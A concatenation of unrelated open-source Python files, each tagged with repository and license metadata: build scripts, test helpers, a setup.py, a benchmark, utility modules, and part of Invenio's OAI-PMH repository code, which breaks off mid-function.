if self._rebuild([os.path.join("msg", "messages.js")],
[os.path.join("msg", "json", f) for f in
["en.json", "qqq.json", "synonyms.json"]]):
try:
subprocess.check_call([
"python",
os.path.join("i18n", "js_to_json.py"),
"--input_file", "msg/messages.js",
"--output_dir", "msg/json/",
"--quiet"])
except (subprocess.CalledProcessError, OSError) as e:
# Documentation for subprocess.check_call says that CalledProcessError
# will be raised on failure, but I found that OSError is also possible.
print("Error running i18n/js_to_json.py: ", e)
sys.exit(1)
# Checking whether it is necessary to rebuild the js files would be a lot of
# work since we would have to compare each <lang>.json file with each
# <lang>.js file. Rebuilding is easy and cheap, so just go ahead and do it.
try:
# Use create_messages.py to create .js files from .json files.
cmd = [
"python",
os.path.join("i18n", "create_messages.py"),
"--source_lang_file", os.path.join("msg", "json", "en.json"),
"--source_synonym_file", os.path.join("msg", "json", "synonyms.json"),
"--key_file", os.path.join("msg", "json", "keys.json"),
"--output_dir", os.path.join("msg", "js"),
"--quiet"]
json_files = glob.glob(os.path.join("msg", "json", "*.json"))
json_files = [file for file in json_files if not
(file.endswith(("keys.json", "synonyms.json", "qqq.json")))]
cmd.extend(json_files)
subprocess.check_call(cmd)
except (subprocess.CalledProcessError, OSError) as e:
print("Error running i18n/create_messages.py: ", e)
sys.exit(1)
# Output list of .js files created.
for f in json_files:
# This assumes the path to the current directory does not contain "json".
f = f.replace("json", "js")
if os.path.isfile(f):
print("SUCCESS: " + f)
else:
print("FAILED to create " + f)
def exclude_vertical(item):
return not item.endswith("block_render_svg_vertical.js")
def exclude_horizontal(item):
return not item.endswith("block_render_svg_horizontal.js")
if __name__ == "__main__":
try:
calcdeps = import_path(os.path.join(
os.path.pardir, "closure-library", "closure", "bin", "calcdeps.py"))
except ImportError:
if os.path.isdir(os.path.join(os.path.pardir, "closure-library-read-only")):
# Dir got renamed when Closure moved from Google Code to GitHub in 2014.
print("Error: Closure directory needs to be renamed from"
"'closure-library-read-only' to 'closure-library'.\n"
"Please rename this directory.")
elif os.path.isdir(os.path.join(os.path.pardir, "google-closure-library")):
# When Closure is installed by npm, it is named "google-closure-library".
#calcdeps = import_path(os.path.join(
# os.path.pardir, "google-closure-library", "closure", "bin", "calcdeps.py"))
print("Error: Closure directory needs to be renamed from"
"'google-closure-library' to 'closure-library'.\n"
"Please rename this directory.")
else:
print("""Error: Closure not found. Read this:
developers.google.com/blockly/guides/modify/web/closure""")
sys.exit(1)
search_paths = calcdeps.ExpandDirectories(
["core", os.path.join(os.path.pardir, "closure-library")])
search_paths_horizontal = filter(exclude_vertical, search_paths)
search_paths_vertical = filter(exclude_horizontal, search_paths)
# Run all tasks in parallel threads.
# Uncompressed is limited by processor speed.
# Compressed is limited by network and server speed.
# Vertical:
Gen_uncompressed(search_paths_vertical, True).start()
# Horizontal:
Gen_uncompressed(search_paths_horizontal, False).start()
# Compressed forms of vertical and horizontal.
Gen_compressed(search_paths_vertical, search_paths_horizontal).start()
# This is run locally in a separate thread.
Gen_langfiles().start()
| kesl-scratch/PopconBot | scratch-blocks/build.py | Python | mit | 18,550 | 0.007978 |
import hashlib
def handle_uploaded_file(f):
# Store the upload under media/image/, prefixing the name with the
# file's MD5 digest so uploads with the same name don't collide.
img_url = 'media/image/' + CalcMD5(f) + f.name
with open(img_url, 'wb+') as destination:
# Django's UploadedFile.chunks() seeks back to the start of the file
# before iterating, so the full read done by CalcMD5() above is safe.
for chunk in f.chunks():
destination.write(chunk)
return ('/' + img_url, f.name)
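# Usage sketch (illustrative, inside a Django view handling an upload):
# url, name = handle_uploaded_file(request.FILES['image'])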
def CalcMD5(f):
md5obj = hashlib.md5()
md5obj.update(f.read())
hash = md5obj.hexdigest()
return hash
| unixhot/opencmdb | util/util.py | Python | apache-2.0 | 366 | 0.008197 |
# -*- coding: utf-8 -*-
# from pytest import raises
# The parametrize function is generated, so this doesn't work:
#
# from pytest.mark import parametrize
#
import pytest
parametrize = pytest.mark.parametrize
# from duckomatic import metadata
# TODO: Importing this is broken because six.moves.urllib gives
# an import error.
# from duckomatic.__main__ import main
class TestMain(object):
def test_fake(self):
pass
# @parametrize('helparg', ['-h', '--help'])
# def test_help(self, helparg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', helparg])
# out, err = capsys.readouterr()
# # Should have printed some sort of usage message. We don't
# # need to explicitly test the content of the message.
# assert 'usage' in out
# # Should have used the program name from the argument
# # vector.
# assert 'progname' in out
# # Should exit with zero return code.
# assert exc_info.value.code == 0
# @parametrize('versionarg', ['-V', '--version'])
# def test_version(self, versionarg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', versionarg])
# out, err = capsys.readouterr()
# # Should print out version.
# assert err == '{0} {1}\n'.format(metadata.project, metadata.version)
# # Should exit with zero return code.
# assert exc_info.value.code == 0
| morgangalpin/duckomatic | tests/test_main.py | Python | gpl-3.0 | 1,476 | 0 |
# Copyright 2014 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import random
from neutron.agent.linux import ovs_lib
from neutron.agent.linux import utils
from neutron.common import constants as n_const
from neutron.tests import base
BR_PREFIX = 'test-br'
class BaseLinuxTestCase(base.BaseTestCase):
def setUp(self, root_helper='sudo'):
super(BaseLinuxTestCase, self).setUp()
self.root_helper = root_helper
def check_command(self, cmd, error_text, skip_msg):
try:
utils.execute(cmd)
except RuntimeError as e:
if error_text in str(e):
self.skipTest(skip_msg)
raise
def check_sudo_enabled(self):
if os.environ.get('OS_SUDO_TESTING') not in base.TRUE_STRING:
self.skipTest('testing with sudo is not enabled')
def get_rand_name(self, max_length, prefix='test'):
name = prefix + str(random.randint(1, 0x7fffffff))
return name[:max_length]
def create_resource(self, name_prefix, creation_func, *args, **kwargs):
"""Create a new resource that does not already exist.
:param name_prefix: The prefix for a randomly generated name
:param creation_func: A function taking the name of the resource
to be created as its first argument. An error is assumed
to indicate a name collision.
:param *args *kwargs: These will be passed to the create function.
"""
while True:
name = self.get_rand_name(n_const.DEV_NAME_MAX_LEN, name_prefix)
try:
return creation_func(name, *args, **kwargs)
except RuntimeError:
continue
class BaseOVSLinuxTestCase(BaseLinuxTestCase):
def setUp(self, root_helper='sudo'):
super(BaseOVSLinuxTestCase, self).setUp(root_helper)
self.ovs = ovs_lib.BaseOVS(self.root_helper)
def create_ovs_bridge(self, br_prefix=BR_PREFIX):
br = self.create_resource(br_prefix, self.ovs.add_bridge)
self.addCleanup(br.destroy)
return br
| onecloud/neutron | neutron/tests/functional/agent/linux/base.py | Python | apache-2.0 | 2,637 | 0 |
#!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark cexp."""
from __future__ import print_function
import timeit
NAME = "cexp"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from random import random; from cmath import exp;"
stmt = "re = (random()*100.0) - 50.0; im = (random()*100.0) - 50.0; y = exp(re + 1.0j * im);"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/cexp/benchmark/python/benchmark.py | Python | apache-2.0 | 2,220 | 0.00045 |
#!/usr/bin/env python
"""This does HTTP GET requests given a host:port and path and returns
a subset of the headers plus the body of the result."""
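# Example invocation (illustrative host and path; positional arguments are
# host:port, a path without a leading slash, then the headers to print):
# get-with-headers.py localhost:8000 'raw-file/tip/a' content-type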
from __future__ import absolute_import, print_function
import json
import os
import sys
from edenscm.mercurial import util
httplib = util.httplib
try:
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
except ImportError:
pass
twice = False
if "--twice" in sys.argv:
sys.argv.remove("--twice")
twice = True
headeronly = False
if "--headeronly" in sys.argv:
sys.argv.remove("--headeronly")
headeronly = True
formatjson = False
if "--json" in sys.argv:
sys.argv.remove("--json")
formatjson = True
hgproto = None
if "--hgproto" in sys.argv:
idx = sys.argv.index("--hgproto")
hgproto = sys.argv[idx + 1]
sys.argv.pop(idx)
sys.argv.pop(idx)
tag = None
def request(host, path, show):
assert not path.startswith("/"), path
global tag
headers = {}
if tag:
headers["If-None-Match"] = tag
if hgproto:
headers["X-HgProto-1"] = hgproto
conn = httplib.HTTPConnection(host)
conn.request("GET", "/" + path, None, headers)
response = conn.getresponse()
print(response.status, response.reason)
if show[:1] == ["-"]:
show = sorted(h for h, v in response.getheaders() if h.lower() not in show)
for h in [h.lower() for h in show]:
if response.getheader(h, None) is not None:
print("%s: %s" % (h, response.getheader(h)))
if not headeronly:
print()
data = response.read()
# Pretty print JSON. This also has the beneficial side-effect
# of verifying emitted JSON is well-formed.
if formatjson:
# json.dumps() will print trailing newlines. Eliminate them
# to make tests easier to write.
data = json.loads(data)
lines = json.dumps(data, sort_keys=True, indent=2).splitlines()
for line in lines:
print(line.rstrip())
else:
sys.stdout.write(data)
if twice and response.getheader("ETag", None):
tag = response.getheader("ETag")
return response.status
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if twice:
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if 200 <= status <= 305:
sys.exit(0)
sys.exit(1)
| facebookexperimental/eden | eden/hg-server/tests/get-with-headers.py | Python | gpl-2.0 | 2,434 | 0.000411 |
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Installation script for Python nupic package."""
import os
import setuptools
import sys
from setuptools import setup, find_packages, Extension
REPO_DIR = os.path.dirname(os.path.realpath(__file__))
def getVersion():
"""
Get version from local file.
"""
with open(os.path.join(REPO_DIR, "VERSION"), "r") as versionFile:
return versionFile.read().strip()
def parse_file(requirementFile):
try:
return [
line.strip()
for line in open(requirementFile).readlines()
if not line.startswith("#")
]
except IOError:
return []
def findRequirements():
"""
Read the requirements.txt file and parse into requirements for setup's
install_requirements option.
"""
requirementsPath = os.path.join(REPO_DIR, "external", "common",
"requirements.txt")
requirements = parse_file(requirementsPath)
return requirements
if __name__ == "__main__":
requirements = findRequirements()
setup(
name="nupic",
version=getVersion(),
install_requires=requirements,
package_dir = {"": "src"},
packages=find_packages("src"),
namespace_packages = ["nupic"],
package_data={
"nupic.support": ["nupic-default.xml",
"nupic-logging.conf"],
"nupic": ["README.md", "LICENSE.txt"],
"nupic.data": ["*.json"],
"nupic.frameworks.opf.exp_generator": ["*.json", "*.tpl"],
"nupic.frameworks.opf.jsonschema": ["*.json"],
"nupic.swarming.exp_generator": ["*.json", "*.tpl"],
"nupic.swarming.jsonschema": ["*.json"],
"nupic.datafiles": ["*.csv", "*.txt"],
},
include_package_data=True,
zip_safe=False,
description="Numenta Platform for Intelligent Computing",
author="Numenta",
author_email="[email protected]",
url="https://github.com/numenta/nupic",
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
# It has to be "5 - Production/Stable" or else pypi rejects it!
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
],
long_description=(
"Numenta Platform for Intelligent Computing: a machine intelligence "
"platform that implements the HTM learning algorithms. HTM is a "
"detailed computational theory of the neocortex. At the core of HTM "
"are time-based continuous learning algorithms that store and recall "
"spatial and temporal patterns. NuPIC is suited to a variety of "
"problems, particularly anomaly detection and prediction of streaming "
"data sources.\n\n"
"For more information, see http://numenta.org or the NuPIC wiki at "
"https://github.com/numenta/nupic/wiki.")
)
| mcanthony/nupic | setup.py | Python | agpl-3.0 | 4,025 | 0.00472 |
"""Index interaction code
"""
| RalfBarkow/Zettelkasten | venv/lib/python3.9/site-packages/pip/_internal/index/__init__.py | Python | gpl-3.0 | 30 | 0 |
from typing import List, TypeVar
C = TypeVar('C') # how to constrain to only the closure below?
def color_factory(color_code: str) -> C:
def apply(text: str, format_spec: str = '') -> str:
return color_code + format(text, format_spec) + '\033[0m'
def mix(*colors: C) -> List[C]:
return [color_factory(c.color_code + color_code) for c in colors]
apply.mix, apply.color_code = mix, color_code
return apply
class Colors:
BLUE = color_factory('\033[94m')
GREEN = color_factory('\033[92m')
YELLOW = color_factory('\033[93m')
RED = color_factory('\033[91m')
MAGENTA = color_factory('\033[95m')
CYAN = color_factory('\033[96m')
ORANGE = color_factory('\033[38;5;208m')
BOLD = color_factory('\033[1m')
DIM = color_factory('\033[2m')
BLUE_BOLD, BLUE_DIM = BLUE.mix(BOLD, DIM)
GREEN_BOLD, GREEN_DIM = GREEN.mix(BOLD, DIM)
YELLOW_BOLD, YELLOW_DIM = YELLOW.mix(BOLD, DIM)
RED_BOLD, RED_DIM = RED.mix(BOLD, DIM)
MAGENTA_BOLD, MAGENTA_DIM = MAGENTA.mix(BOLD, DIM)
CYAN_BOLD, CYAN_DIM = CYAN.mix(BOLD, DIM)
ORANGE_BOLD, ORANGE_DIM = ORANGE.mix(BOLD, DIM)
| rsalmei/clearly | clearly/utils/colors.py | Python | mit | 1,146 | 0 |
import pytest
from django.contrib.contenttypes.models import ContentType
from addons.osfstorage import settings as osfstorage_settings
from osf.models import BaseFileNode, Folder, File
from osf_tests.factories import (
UserFactory,
ProjectFactory
)
pytestmark = pytest.mark.django_db
@pytest.fixture()
def user():
return UserFactory()
@pytest.fixture()
def project(user):
return ProjectFactory(creator=user)
@pytest.fixture()
def create_test_file(fake):
# TODO: Copied from api_tests/utils.py. DRY this up.
def _create_test_file(target, user=None, filename=None, create_guid=True):
filename = filename or fake.file_name()
user = user or target.creator
osfstorage = target.get_addon('osfstorage')
root_node = osfstorage.get_root()
test_file = root_node.append_file(filename)
if create_guid:
test_file.get_guid(create=True)
test_file.create_version(user, {
'object': '06d80e',
'service': 'cloud',
osfstorage_settings.WATERBUTLER_RESOURCE: 'osf',
}, {
'size': 1337,
'contentType': 'img/png'
}).save()
return test_file
return _create_test_file
def test_active_manager_does_not_return_trashed_file_nodes(project, create_test_file):
create_test_file(target=project)
deleted_file = create_test_file(target=project)
deleted_file.delete(user=project.creator, save=True)
content_type_for_query = ContentType.objects.get_for_model(project)
# root folder + file + deleted_file = 3 BaseFileNodes
assert BaseFileNode.objects.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 3
# root folder + file = 2 BaseFileNodes
assert BaseFileNode.active.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 2
def test_folder_update_calls_folder_update_method(project, create_test_file):
file = create_test_file(target=project)
parent_folder = file.parent
# the folder update method should be the Folder.update method
assert parent_folder.__class__.update == Folder.update
# the folder update method should not be the File update method
assert parent_folder.__class__.update != File.update
# the file update method should be the File update method
assert file.__class__.update == File.update
| erinspace/osf.io | osf_tests/test_files.py | Python | apache-2.0 | 2,401 | 0.002499 |
# This file is part of Invenio.
# Copyright (C) 2009, 2010, 2011, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Receive OAI-PMH 2.0 requests and responds"""
__revision__ = "$Id$"
from six.moves import cPickle
import os
import re
import time
import tempfile
import sys
import datetime
if sys.hexversion < 0x2050000:
from glob import glob as iglob
else:
from glob import iglob
from flask import url_for, abort
from flask_login import current_user
from intbitset import intbitset
from six import iteritems
from invenio.config import \
CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG, \
CFG_CACHEDIR, \
CFG_CERN_SITE, \
CFG_OAI_DELETED_POLICY, \
CFG_OAI_EXPIRE, \
CFG_OAI_FRIENDS, \
CFG_OAI_IDENTIFY_DESCRIPTION, \
CFG_OAI_ID_FIELD, \
CFG_OAI_ID_PREFIX, \
CFG_OAI_LOAD, \
CFG_OAI_METADATA_FORMATS, \
CFG_OAI_PREVIOUS_SET_FIELD, \
CFG_OAI_PROVENANCE_ALTERED_SUBFIELD, \
CFG_OAI_PROVENANCE_BASEURL_SUBFIELD, \
CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD, \
CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD, \
CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD, \
CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD, \
CFG_OAI_SAMPLE_IDENTIFIER, \
CFG_OAI_SET_FIELD, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_URL, \
CFG_WEBSTYLE_HTTP_USE_COMPRESSION
from invenio.base.globals import cfg
from invenio.ext.logging import register_exception
from invenio.legacy.bibrecord import record_get_field_instances
from invenio.legacy.dbquery import run_sql, wash_table_column_name, \
datetime_format
from invenio.legacy.oairepository.config import CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC
from invenio.legacy.search_engine import record_exists, \
search_unit_in_bibxxx, get_record
from invenio_formatter import format_record
from invenio.modules.search.api import Query
from invenio.utils.date import localtime_to_utc, utc_to_localtime
from invenio.utils.html import X, EscapedXMLString
CFG_VERBS = {
'GetRecord' : ['identifier', 'metadataPrefix'],
'Identify' : [],
'ListIdentifiers' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListMetadataFormats': ['identifier'],
'ListRecords' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListSets' : ['resumptionToken']
}
CFG_ERRORS = {
"badArgument": "The request includes illegal arguments, is missing required arguments, includes a repeated argument, or values for arguments have an illegal syntax:",
"badResumptionToken": "The value of the resumptionToken argument is invalid or expired:",
"badVerb": "Value of the verb argument is not a legal OAI-PMH verb, the verb argument is missing, or the verb argument is repeated:",
"cannotDisseminateFormat": "The metadata format identified by the value given for the metadataPrefix argument is not supported by the item or by the repository:",
"idDoesNotExist": "The value of the identifier argument is unknown or illegal in this repository:",
"noRecordsMatch": "The combination of the values of the from, until, set and metadataPrefix arguments results in an empty list:",
"noMetadataFormats": "There are no metadata formats available for the specified item:",
"noSetHierarchy": "The repository does not support sets:"
}
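## A typical harvesting request served by this module looks like the
## following (illustrative): /oai2d?verb=ListRecords&metadataPrefix=oai_dc&from=2015-01-01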
CFG_MIN_DATE = "1970-01-01T00:00:00Z"
CFG_MAX_DATE = "9999-12-31T23:59:59Z"
def get_all_field_values(tag):
"""
Return all existing values stored for a given tag.
@param tag: the full tag, e.g. 909C0b
@type tag: string
@return: the list of values
@rtype: list of strings
"""
table = 'bib%02dx' % int(tag[:2])
return [row[0] for row in run_sql("SELECT DISTINCT(value) FROM %s WHERE tag=%%s" % table, (tag, ))]
def oai_error(argd, errors):
"""
Return a well-formatted OAI-PMH error
"""
out = """<?xml version="1.0" encoding="UTF-8"?>
<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/
http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">"""
out += X.responseDate()(get_utc_now())
for error_code, error_msg in errors:
assert(error_code in CFG_ERRORS)
if error_code in ("badArgument", "badVerb"):
out += X.request()(oai_get_request_url())
break
else:
## There are no badArgument or badVerb errors so we can
## return the whole request information
out += X.request(**argd)(oai_get_request_url())
for error_code, error_msg in errors:
if error_msg is None:
error_msg = CFG_ERRORS[error_code]
else:
error_msg = "%s %s" % (CFG_ERRORS[error_code], error_msg)
out += X.error(code=error_code)(error_msg)
out += "</OAI-PMH>"
return out
def oai_header(argd, verb):
"""
Return OAI header
"""
out = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\n"
out += "<?xml-stylesheet type=\"text/xsl\" href=\"%s\" ?>\n" % (
url_for('oairepository.static',
filename='xsl/oairepository/oai2.xsl.v1.0'))
out += "<OAI-PMH xmlns=\"http://www.openarchives.org/OAI/2.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd\">\n"
#out += "<responseDate>%s</responseDate>" % get_utc_now()
out += X.responseDate()(get_utc_now())
if verb:
out += X.request(**argd)(oai_get_request_url())
out += "<%s>\n" % verb
else:
out += X.request()(oai_get_request_url())
return out
def oai_footer(verb):
"""
@return: the OAI footer.
"""
out = ""
if verb:
out += "</%s>\n" % (verb)
out += "</OAI-PMH>\n"
return out
def get_field(recid, field):
"""
Gets list of field 'field' for the record with 'recid' system number.
"""
digit = field[0:2]
bibbx = "bib%sx" % digit
bibx = "bibrec_bib%sx" % digit
query = "SELECT bx.value FROM %s AS bx, %s AS bibx WHERE bibx.id_bibrec=%%s AND bx.id=bibx.id_bibxxx AND bx.tag=%%s" % (wash_table_column_name(bibbx), wash_table_column_name(bibx))
return [row[0] for row in run_sql(query, (recid, field))]
def get_modification_date(recid):
"""Returns the date of last modification for the record 'recid'.
Return empty string if no record or modification date in UTC.
"""
out = ""
res = run_sql("SELECT " + datetime_format('modification_date') + " FROM bibrec WHERE id=%s", (recid,), 1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_earliest_datestamp():
"""Get earliest datestamp in the database
Return empty string if no records or earliest datestamp in UTC.
"""
out = CFG_MIN_DATE
res = run_sql("SELECT " + datetime_format('MIN(creation_date)', False) + " FROM bibrec", n=1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_latest_datestamp():
"""Get latest datestamp in the database
Return empty string if no records or latest datestamp in UTC.
"""
out = CFG_MAX_DATE
res = run_sql("SELECT " + datetime_format('MAX(modification_date)', False) + " FROM bibrec", n=1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def check_date(date):
"""Check if given date has a correct format, complying to "Complete date" or
"Complete date plus hours, minutes and seconds" formats defined in ISO8601."""
    if re.match(r"\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\dZ)?\Z", date) is not None:
return date
else:
return ""
def normalize_date(date, dtime="T00:00:00Z"):
"""
Normalize the given date to the
"Complete date plus hours, minutes and seconds" format defined in ISO8601
(If "hours, minutes and seconds" part is missing, append 'dtime' to date).
'date' must be checked before with check_date(..).
Returns empty string if cannot be normalized
"""
if len(date) == 10:
date = date + dtime
elif len(date) != 20:
date = ""
return date
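## Worked examples (illustrative): check_date("2012-01-01") returns the date
## unchanged while check_date("01/01/2012") returns ""; normalize_date then
## expands "2012-01-01" to "2012-01-01T00:00:00Z", and a full 20-character
## timestamp passes through untouched.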
def get_record_provenance(recid):
"""
Return the provenance XML representation of a record, suitable to be put
in the about tag.
"""
record = get_record(recid)
provenances = record_get_field_instances(record, CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[:3], CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[3], CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[4])
out = ""
for provenance in provenances:
base_url = identifier = datestamp = metadata_namespace = origin_description = harvest_date = altered = ""
for (code, value) in provenance[0]:
if code == CFG_OAI_PROVENANCE_BASEURL_SUBFIELD:
base_url = value
elif code == CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[5]:
identifier = value
elif code == CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD:
datestamp = value
elif code == CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD:
metadata_namespace = value
elif code == CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD:
origin_description = value
elif code == CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD:
harvest_date = value
elif code == CFG_OAI_PROVENANCE_ALTERED_SUBFIELD:
altered = value
if base_url:
out += """<provenance xmlns="http://www.openarchives.org/OAI/2.0/provenance" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/provenance http://www.openarchives.org/OAI/2.0/provenance.xsd">"""
out += X.originDescription(harvestDate=harvest_date, altered=altered)(
X.baseURL()(base_url),
X.identifier()(identifier),
X.datestamp()(datestamp),
X.metadataNamespace()(metadata_namespace),
origin_description and X.originDescription(origin_description) or '' ## This is already XML
)
out += """</provenance>"""
return out
def get_record_rights(dummy):
"""
Return the record rights parts, suitable to be put in the about tag.
"""
return ""
## FIXME: This need to be thought in a good way. What shall we really
## put in the rights parts?
#record = get_record(recid)
#rights = record_get_field_instances(record, CFG_OAI_RIGHTS_FIELD[:3], CFG_OAI_RIGHTS_FIELD[3], CFG_OAI_RIGHTS_FIELD[4])
#license = record_get_field_instances(record, CFG_OAI_LICENSE_FIELD[:3], CFG_OAI_LICENSE_FIELD[3], CFG_OAI_LICENSE_FIELD[4])
#holder = date = rights_uri = contact = statement = terms = publisher = license_uri = ''
#if rights:
#for code, value in rights[0][0]:
#if code == CFG_OAI_RIGHTS_HOLDER_SUBFIELD:
#holder = value
#elif code == CFG_OAI_RIGHTS_DATE_SUBFIELD:
#date = value
#elif code == CFG_OAI_RIGHTS_URI_SUBFIELD:
#rights_uri = value
#elif code == CFG_OAI_RIGHTS_CONTACT_SUBFIELD:
#contact = value
#elif CFG_OAI_RIGHTS_STATEMENT_SUBFIELD:
#statement = value
#if license:
#for code, value in license[0][0]:
#if code == CFG_OAI_LICENSE_TERMS_SUBFIELD:
#terms = value
#elif code == CFG_OAI_LICENSE_PUBLISHER_SUBFIELD:
#publisher = value
#elif code == CFG_OAI_LICENSE_URI_SUBFIELD:
#license_uri = value
def print_record(recid, prefix='marcxml', verb='ListRecords', set_spec=None, set_last_updated=None):
"""Prints record 'recid' formatted according to 'prefix'.
- if record does not exist, return nothing.
- if record has been deleted and CFG_OAI_DELETED_POLICY is
      'transient' or 'persistent', then return only header, with status
'deleted'.
- if record has been deleted and CFG_OAI_DELETED_POLICY is 'no',
then return nothing.
"""
record_exists_result = record_exists(recid) == 1
if record_exists_result:
sets = get_field(recid, CFG_OAI_SET_FIELD)
        if set_spec is not None and set_spec not in sets and not [set_ for set_ in sets if set_.startswith("%s:" % set_spec)]:
## the record is not in the requested set, and is not
## in any subset
record_exists_result = False
if record_exists_result:
status = None
else:
status = 'deleted'
if not record_exists_result and CFG_OAI_DELETED_POLICY not in ('persistent', 'transient'):
return ""
idents = get_field(recid, CFG_OAI_ID_FIELD)
if not idents:
return ""
## FIXME: Move these checks in a bibtask
#try:
#assert idents, "No OAI ID for record %s, please do your checks!" % recid
#except AssertionError as err:
#register_exception(alert_admin=True)
#return ""
#try:
#assert len(idents) == 1, "More than OAI ID found for recid %s. Considering only the first one, but please do your checks: %s" % (recid, idents)
#except AssertionError as err:
#register_exception(alert_admin=True)
ident = idents[0]
header_body = EscapedXMLString('')
header_body += X.identifier()(ident)
if set_last_updated:
header_body += X.datestamp()(max(get_modification_date(recid), set_last_updated))
else:
header_body += X.datestamp()(get_modification_date(recid))
for set_spec in get_field(recid, CFG_OAI_SET_FIELD):
if set_spec and set_spec != CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC:
# Print only if field not empty
header_body += X.setSpec()(set_spec)
header = X.header(status=status)(header_body)
if verb == 'ListIdentifiers':
return header
else:
if record_exists_result:
metadata_body = format_record(recid, CFG_OAI_METADATA_FORMATS[prefix][0])
metadata = X.metadata(body=metadata_body)
provenance_body = get_record_provenance(recid)
if provenance_body:
